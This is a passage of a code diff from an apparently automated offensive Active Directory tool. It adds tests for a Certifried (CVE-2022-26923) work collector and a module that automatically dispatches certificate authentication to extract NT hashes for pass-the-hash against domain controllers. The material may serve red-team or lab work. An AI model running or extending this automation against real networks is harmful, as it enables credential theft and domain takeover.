+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "certifried:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dc_hostname_resolved_from_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_hostname, Some("dc01.contoso.local".into()));
+ }
+
+ #[test]
+ fn collect_dc_hostname_none_when_no_host_match() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dc_hostname.is_none());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_when_only_cross_forest_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ // Certifried needs a target-domain credential to create a machine
+ // account in the target forest; cross-forest creds cannot do this.
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_certifried_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("certifried:{}", "contoso.local");
+ assert_eq!(key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "certifried:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CERTIFRIED, "certifried");
+ }
+
+ #[test]
+ fn dc_hostname_from_hosts() {
+ // Simulates finding a DC hostname from hosts list
+ let hostname = "dc01.contoso.local";
+ let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty());
+ assert_eq!(filtered, Some("dc01.contoso.local".to_string()));
+
+ let empty = Some("".to_string()).filter(|h| !h.is_empty());
+ assert!(empty.is_none());
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = serde_json::json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "dc_hostname": "dc01.contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "certifried");
+ assert_eq!(payload["cve"], "CVE-2022-26923");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["dc_hostname"], "dc01.contoso.local");
+ }
+
+ #[test]
+ fn payload_without_dc_hostname() {
+ let payload = serde_json::json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "dc_hostname": null,
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert!(payload["dc_hostname"].is_null());
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CertifriedWork {
+ dedup_key: "certifried:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ dc_hostname: Some("dc01.contoso.local".into()),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into()));
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn work_struct_without_hostname() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CertifriedWork {
+ dedup_key: "certifried:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ dc_hostname: None,
+ credential: cred,
+ };
+ assert!(work.dc_hostname.is_none());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs
new file mode 100644
index 00000000..af498b33
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs
@@ -0,0 +1,749 @@
+//! auto_certipy_auth -- authenticate using obtained certificates.
+//!
+//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx),
+//! this automation dispatches `certipy auth` to convert the certificate
+//! into an NT hash, enabling pass-the-hash for the impersonated user.
+//!
+//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities
+//! which is registered by the ADCS exploitation result processor.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Authenticates with obtained certificates to extract NT hashes.
+/// Interval: 30s.
+pub async fn auto_certipy_auth(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("certipy_auth") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_cert_auth_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "certipy_auth",
+ "vuln_id": item.vuln_id,
+ "pfx_path": item.pfx_path,
+ "domain": item.domain,
+ "target_user": item.target_user,
+ });
+
+ if let Some(ref dc) = item.dc_ip {
+ payload["target_ip"] = json!(dc);
+ payload["dc_ip"] = json!(dc);
+ }
+
+ let priority = dispatcher.effective_priority("certipy_auth");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ vuln_id = %item.vuln_id,
+ user = %item.target_user,
+ "Certificate authentication dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(vuln_id = %item.vuln_id, "Certificate auth deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth");
+ }
+ }
+ }
+ }
+}
+
+/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without
+/// needing a `Dispatcher` or async runtime (beyond state construction).
+fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec {
+ state
+ .discovered_vulnerabilities
+ .values()
+ .filter_map(|vuln| {
+ let vtype = vuln.vuln_type.to_lowercase();
+ if vtype != "certificate_obtained" && vtype != "adcs_certificate" {
+ return None;
+ }
+
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ return None;
+ }
+
+ let dedup_key = format!("cert_auth:{}", vuln.vuln_id);
+ if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) {
+ return None;
+ }
+
+ let pfx_path = vuln
+ .details
+ .get("pfx_path")
+ .or_else(|| vuln.details.get("certificate_path"))
+ .or_else(|| vuln.details.get("cert_file"))
+ .and_then(|v| v.as_str())
+ .map(|s| s.to_string())?;
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let target_user = vuln
+ .details
+ .get("target_user")
+ .or_else(|| vuln.details.get("upn"))
+ .or_else(|| vuln.details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator")
+ .to_string();
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&domain.to_lowercase())
+ .cloned();
+
+ Some(CertAuthWork {
+ vuln_id: vuln.vuln_id.clone(),
+ dedup_key,
+ pfx_path,
+ domain,
+ target_user,
+ dc_ip,
+ })
+ })
+ .collect()
+}
+
+struct CertAuthWork {
+ vuln_id: String,
+ dedup_key: String,
+ pfx_path: String,
+ domain: String,
+ target_user: String,
+ dc_ip: Option,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("cert_auth:{}", "vuln-cert-001");
+ assert_eq!(key, "cert_auth:vuln-cert-001");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth");
+ }
+
+ #[test]
+ fn cert_vuln_types_accepted() {
+ let types = [
+ "certificate_obtained",
+ "adcs_certificate",
+ "CERTIFICATE_OBTAINED",
+ ];
+ for t in &types {
+ let lower = t.to_lowercase();
+ assert!(
+ lower == "certificate_obtained" || lower == "adcs_certificate",
+ "{t} should match"
+ );
+ }
+ }
+
+ #[test]
+ fn non_cert_vuln_types_rejected() {
+ let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"];
+ for t in &non_cert {
+ let lower = t.to_lowercase();
+ assert!(lower != "certificate_obtained" && lower != "adcs_certificate");
+ }
+ }
+
+ #[test]
+ fn pfx_path_fallback_chain() {
+ // Primary key
+ let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"});
+ let path = details
+ .get("pfx_path")
+ .or_else(|| details.get("certificate_path"))
+ .or_else(|| details.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path, Some("/tmp/cert.pfx"));
+
+ // Fallback to certificate_path
+ let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"});
+ let path2 = details2
+ .get("pfx_path")
+ .or_else(|| details2.get("certificate_path"))
+ .or_else(|| details2.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path2, Some("/tmp/alt.pfx"));
+
+ // Fallback to cert_file
+ let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"});
+ let path3 = details3
+ .get("pfx_path")
+ .or_else(|| details3.get("certificate_path"))
+ .or_else(|| details3.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert_eq!(path3, Some("/tmp/other.pfx"));
+
+ // No key returns None
+ let details4 = serde_json::json!({});
+ let path4 = details4
+ .get("pfx_path")
+ .or_else(|| details4.get("certificate_path"))
+ .or_else(|| details4.get("cert_file"))
+ .and_then(|v| v.as_str());
+ assert!(path4.is_none());
+ }
+
+ #[test]
+ fn target_user_fallback() {
+ let details = serde_json::json!({"target_user": "admin"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "admin");
+
+ // Falls back to "administrator" when no key present
+ let details2 = serde_json::json!({});
+ let user2 = details2
+ .get("target_user")
+ .or_else(|| details2.get("upn"))
+ .or_else(|| details2.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user2, "administrator");
+ }
+
+ #[test]
+ fn cert_auth_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ assert_eq!(payload["technique"], "certipy_auth");
+ assert_eq!(payload["pfx_path"], "/tmp/cert.pfx");
+ assert_eq!(payload["target_user"], "administrator");
+ }
+
+ #[test]
+ fn cert_auth_payload_with_dc() {
+ let mut payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ let dc_ip = Some("192.168.58.10".to_string());
+ if let Some(ref dc) = dc_ip {
+ payload["target_ip"] = serde_json::json!(dc);
+ payload["dc_ip"] = serde_json::json!(dc);
+ }
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["dc_ip"], "192.168.58.10");
+ }
+
+ #[test]
+ fn cert_auth_payload_without_dc() {
+ let payload = serde_json::json!({
+ "technique": "certipy_auth",
+ "vuln_id": "cert-001",
+ "pfx_path": "/tmp/cert.pfx",
+ "domain": "contoso.local",
+ "target_user": "administrator",
+ });
+ assert!(payload.get("target_ip").is_none());
+ assert!(payload.get("dc_ip").is_none());
+ }
+
+ #[test]
+ fn target_user_upn_fallback() {
+ let details = serde_json::json!({"upn": "admin@contoso.local"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "admin@contoso.local");
+ }
+
+ #[test]
+ fn target_user_account_name_fallback() {
+ let details = serde_json::json!({"account_name": "svc_sql"});
+ let user = details
+ .get("target_user")
+ .or_else(|| details.get("upn"))
+ .or_else(|| details.get("account_name"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("administrator");
+ assert_eq!(user, "svc_sql");
+ }
+
+ #[test]
+ fn cert_auth_work_construction() {
+ let work = CertAuthWork {
+ vuln_id: "cert-001".into(),
+ dedup_key: "cert_auth:cert-001".into(),
+ pfx_path: "/tmp/cert.pfx".into(),
+ domain: "contoso.local".into(),
+ target_user: "administrator".into(),
+ dc_ip: Some("192.168.58.10".into()),
+ };
+ assert_eq!(work.vuln_id, "cert-001");
+ assert_eq!(work.dc_ip, Some("192.168.58.10".into()));
+ }
+
+ #[test]
+ fn cert_auth_work_no_dc() {
+ let work = CertAuthWork {
+ vuln_id: "cert-002".into(),
+ dedup_key: "cert_auth:cert-002".into(),
+ pfx_path: "/tmp/cert2.pfx".into(),
+ domain: "fabrikam.local".into(),
+ target_user: "admin".into(),
+ dc_ip: None,
+ };
+ assert!(work.dc_ip.is_none());
+ }
+
+ // -- Tests exercising the extracted `collect_cert_auth_work` function --
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_vuln(
+ vuln_id: &str,
+ vuln_type: &str,
+ details: std::collections::HashMap,
+ ) -> ares_core::models::VulnerabilityInfo {
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: vuln_id.into(),
+ vuln_type: vuln_type.into(),
+ target: "192.168.58.10".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_no_work() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_certificate_obtained_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("target_user".into(), serde_json::json!("administrator"));
+ s.discovered_vulnerabilities.insert(
+ "cert-001".into(),
+ make_vuln("cert-001", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_id, "cert-001");
+ assert_eq!(work[0].pfx_path, "/tmp/admin.pfx");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].target_user, "administrator");
+ assert_eq!(work[0].dedup_key, "cert_auth:cert-001");
+ assert!(work[0].dc_ip.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_adcs_certificate_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx"));
+ details.insert("domain".into(), serde_json::json!("fabrikam.local"));
+ details.insert("target_user".into(), serde_json::json!("svc_sql"));
+ s.discovered_vulnerabilities.insert(
+ "cert-002".into(),
+ make_vuln("cert-002", "adcs_certificate", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_id, "cert-002");
+ assert_eq!(work[0].domain, "fabrikam.local");
+ assert_eq!(work[0].target_user, "svc_sql");
+ }
+
+ #[tokio::test]
+ async fn collect_ignores_non_cert_vuln_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ s.discovered_vulnerabilities
+ .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details));
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_exploited_vulnerabilities() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-010".into(),
+ make_vuln("cert-010", "certificate_obtained", details),
+ );
+ s.exploited_vulnerabilities.insert("cert-010".into());
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_already_deduped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-020".into(),
+ make_vuln("cert-020", "certificate_obtained", details),
+ );
+ s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into());
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_vuln_without_pfx_path() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // No pfx_path, certificate_path, or cert_file key at all
+ let mut details = std::collections::HashMap::new();
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-030".into(),
+ make_vuln("cert-030", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_pfx_fallback_to_certificate_path() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("certificate_path".into(), serde_json::json!("/tmp/alt.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-040".into(),
+ make_vuln("cert-040", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].pfx_path, "/tmp/alt.pfx");
+ }
+
+ #[tokio::test]
+ async fn collect_pfx_fallback_to_cert_file() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-050".into(),
+ make_vuln("cert-050", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].pfx_path, "/tmp/other.pfx");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_defaults_to_administrator() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ // No target_user, upn, or account_name
+ s.discovered_vulnerabilities.insert(
+ "cert-060".into(),
+ make_vuln("cert-060", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "administrator");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_from_upn() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("upn".into(), serde_json::json!("admin@contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-070".into(),
+ make_vuln("cert-070", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "admin@contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_from_account_name() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("account_name".into(), serde_json::json!("svc_web"));
+ s.discovered_vulnerabilities.insert(
+ "cert-080".into(),
+ make_vuln("cert-080", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "svc_web");
+ }
+
+ #[tokio::test]
+ async fn collect_resolves_dc_ip_from_domain_controllers() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-090".into(),
+ make_vuln("cert-090", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, Some("192.168.58.10".into()));
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_none_when_domain_not_mapped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // DC registered for a different domain
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-100".into(),
+ make_vuln("cert-100", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dc_ip.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_domain_defaults_to_empty_string() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ // No domain key in details
+ s.discovered_vulnerabilities.insert(
+ "cert-110".into(),
+ make_vuln("cert-110", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_vuln_type() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-120".into(),
+ make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()),
+ );
+ s.discovered_vulnerabilities.insert(
+ "cert-121".into(),
+ make_vuln("cert-121", "Adcs_Certificate", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_mixed_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // Valid cert vuln
+ let mut d1 = std::collections::HashMap::new();
+ d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx"));
+ d1.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-200".into(),
+ make_vuln("cert-200", "certificate_obtained", d1),
+ );
+
+ // Non-cert vuln (should be ignored)
+ let mut d2 = std::collections::HashMap::new();
+ d2.insert("target_ip".into(), serde_json::json!("192.168.58.22"));
+ s.discovered_vulnerabilities.insert(
+ "vuln-smb".into(),
+ make_vuln("vuln-smb", "smb_signing_disabled", d2),
+ );
+
+ // Another valid cert vuln
+ let mut d3 = std::collections::HashMap::new();
+ d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx"));
+ d3.insert("domain".into(), serde_json::json!("fabrikam.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-201".into(),
+ make_vuln("cert-201", "adcs_certificate", d3),
+ );
+ }
